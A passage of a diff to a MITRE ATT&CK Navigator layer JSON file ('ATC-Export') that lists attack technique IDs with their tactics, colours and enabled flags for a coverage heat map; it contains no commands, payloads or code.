"", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1037", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1122", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1177", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "execution", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1011", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0139", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true}
\ No newline at end of file
+{"name": "ATC-Export", "version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1069", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1099", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1091", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1091", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T0005", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1066", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0195", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0016", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0064", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1041", "tactic": "persistence", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", 
"tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0075", "tactic": "defense-evasion", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1222", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1054", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1009", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "persistence", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 
"T1208", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 
"T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": 
"execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1048", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1004", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1146", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0044", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1031", "tactic": "persistence", "color": "#fcf26b", 
